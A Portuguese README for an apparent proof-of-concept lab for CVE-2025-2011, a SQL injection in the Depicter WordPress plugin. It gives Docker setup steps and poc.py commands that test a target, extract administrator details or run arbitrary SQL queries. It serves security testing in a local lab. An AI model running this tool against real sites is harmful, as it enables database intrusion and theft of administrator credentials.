
PoC para CVE-2025-2011 - SQLi no plugin Depicter <= 3.6.1
Referência CVE: CVE-2025-2011
Este repositório contém um ambiente de prova de conceito para testar a vulnerabilidade de injeção de SQL no plugin Depicter Slider & Popup Builder (versões < 3.6.2).
requests, coloramaIniciar o Ambiente
docker-compose up -d
Concluir a Instalação do WordPress
http://localhost:5555Instalar o Plugin Vulnerável
chmod +x install-plugin.sh
./install-plugin.sh
Este script irá:
Instalar as Dependências Python
pip install requests colorama
O script de PoC (poc.py) pode ser usado para testar a vulnerabilidade em diferentes modos:
Verificar se o alvo é vulnerável
python poc.py -u http://localhost:5555
Extrair detalhes do administrador
python poc.py -u http://localhost:5555 -m admin
Executar consulta SQL personalizada
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Ativar a saída de depuração
python poc.py -u http://localhost:5555 -d
Para parar e remover o ambiente:
docker-compose down -v
Este ambiente é fornecido apenas para fins educacionais e de teste. Não o utilize contra nenhum sistema sem permissão explícita.